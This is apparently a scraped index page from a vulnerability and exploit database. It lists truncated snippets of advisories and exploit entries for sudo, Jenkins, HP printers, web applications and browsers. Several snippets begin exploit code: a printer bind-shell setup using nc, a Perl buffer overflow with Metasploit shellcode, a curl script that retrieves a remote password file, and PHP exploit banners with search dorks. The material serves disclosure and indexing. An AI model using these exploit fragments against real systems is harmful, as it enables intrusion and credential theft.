Exploit for Improper Privilege Management in Sudo_Project Sudo

CVE-2023-22809 sudo Privilege escalation Affected sudo ve...

Samsung Internet 代码问题漏洞

Samsung Internet is a mobile application from Samsung South Korea. Samsung Internet version 17.0.1.69 has a code issue vulnerability that can be exploited by attackers to spoof the address bar by executing a script...

Jenkins allows for Privilege Escalation by Remote Authenticated Users

The combination filter Groovy script in Jenkins before 1.600 and LTS before 1.596.1 allows remote authenticated users with job configuration permission to gain privileges and execute arbitrary code on the master via unspecified vectors...

Emerson Electric Emerson DeltaV Distributed Control System 访问控制错误漏洞

Emerson Electric Emerson DeltaV Distributed Control System is an automated distributed control system from Emerson Electric. The system includes features such as network security management, alarm management, batch control, and change management. An access control error vulnerability exists in...

ICHotelReservation 3.3 - (key) Parameter SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: Hotel Reservation Site Script 3.3 - SQL Injection Dork: N/A Date: 13.09.2017 Vendor Homepage: http://www.icloudcenter.com/ Software Link: http://www.icloudcenter.com/hotel-reservation-site-script.htm Demo:...

Topsites Script 1.0 - Cross-Site Request Forgery PHP Code Injection

Topsites Script 1.0 - Cross-Site Request Forgery PHP Code Injection Meta Tags File Footer File...

HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution

Create a bind shell on an unpatched OfficeJet 8210 Write a script to profile.d and reboot the device. When it comes back online then nc to port 1270. easysnmp instructions: sudo apt-get install libsnmp-dev pip install easysnmp import socket import sys from easysnmp import snmpset profiledscript =...

Microsoft Edge - JSON.parse Info Leak

var once = false; var a = 1; function f if!once a = new Array1, 2, 3; this2 = a; once = true; //alert"f " + this; return ; JSON.parse"1, 2, 4, 5", f; var n = new Numbera0; n = n 1; var s = n.toString16; n = new Numbera1; n = n 1; s = s + n.toString16; n.length = 100; n = new Numbera2; n = n 1; s ...

Shellshock Worm Exploits Bash in QNAP NAS Devices

A worm exploiting network attached storage devices vulnerable to the Bash flaw is scanning the Internet for more victims. The worm opens a backdoor on QNAP devices, but to date it appears the attackers are using the exploit to run a click-fraud scam, in addition to maintaining persistence on owne...

RXGoogle.CGI 1.0/2.5 Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/9575/info The rxgoogle.cgi search script is prone to a cross-site scripting vulnerability because the software fails to sanitize user input and allows various metacharacters that may facilitate cross-site scripting attack...

Cmseasy某处存在存储型XSS及代码分析（1）

简要描述： 最新版cmseasy存在存储型xss 版本：CmsEasy5.5UTF-820140415 详细说明： 在bbs下的所有POST提交，都会经过bbspublic.php文件里的removexss函数过滤。如下： 可以看到所有POST数据会到dxss函数里 跟进dxss，可以看到数据又来到了removexss里 继续跟进removexss，从图中的1中可以看到removexss首先过滤了一些特殊符号，接着看图中2处，用循环做了一个html实体解码，接着在图中3处用了htmlentitydecode再次进行了一次解码，然后用if判断判断如果还有html编码就exit。...

Izlebizi Video Script Add Admin Account Exploit

Exploit for php platform in category web applications Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail : submitat1337day.com 1 0 0 1 1 0 I'm ZoRLu member from Inj3ct0r Team 1 1...

Joomla! Component JS Calendar 1.5.1 - Multiple Vulnerabilities

JS Calendar 1.5.1 Joomla Component Multiple Remote Vulnerabilities Name JS Calendar Vendor http://www.joomlaseller.com Versions Affected 1.5.1 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta at gmail dot com Date 2010-10-09 X. INDEX I. ABOUT T...

Mozilla Firefox 3.6.3 Safari 4.0.5 - Access Violation Exception and Unknown Exception

Mozilla Firefox 3.6.3 Safari 4.0.5 - Access Violation Exception and Unknown Exception var...

VUPlayer 2.49 - .asx HREF Local Buffer Overflow (1)

VUPlayer 2.49 - .asx HREF Local Buffer Overflow 1 !/usr/bin/perl intro; does not need a thread method shellcode to run as best as can. seh work great too! win32exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =...

Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit

No description provided by source. !/bin/bash Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit by athos - stakerathotmaildotit host=$1; name=$2; path='/config/passwd.txt'; if "$name" = "" ; then echo "Usage: bash $0 host/path filename"; echo "by athos - stakerathotmaildotit"; exit; fi; curl...

eFiction <= 3.1.1 (path_to_smf) Remote File Include Vulnerabilities

No description provided by source. To ConTacT mE @ www.Asb-May.net/bb ScRiPt:-http://www.efiction.org/downloads/eFiction31.zip GrEaTz To:-ToOofa-HaCk.eGy All AsB-MaY DisCoverY ExPloIts GrOup Discovered By:- ThE dE@Th logout.php:- includeonce$pathtosmf."Sources/Subs-Auth.php"; getsessionvars.php:-...

IMGallery &lt;= 2.5 Create Uploader Script Exploit

No description provided by source. ? //Kacper Settings $exploitname = "IMGallery = 2.5 Create Uploader Script Exploit"; $scriptname = "IMGallery 2.5"; $scriptsite = "http://www.imgallery.zor.pl/"; $dork = '"Powered by IMGallery"'; // print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+...

IMGallery 2.5 - Create Uploader Script

DEVIL TEAM IRC: irc.milw0rm.com:6667 devilteam http://www.rahim.webd.pl/ ======== Contact: [email protected] cod3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=...

dir.txt

Directory Listing Script Cross Site Scripting Risk: Less critical Class: Remote Script: Directory Listing Script Version: not define ---------------------------------------------------------------------------- Example: http://target/path/index.php?dir=code...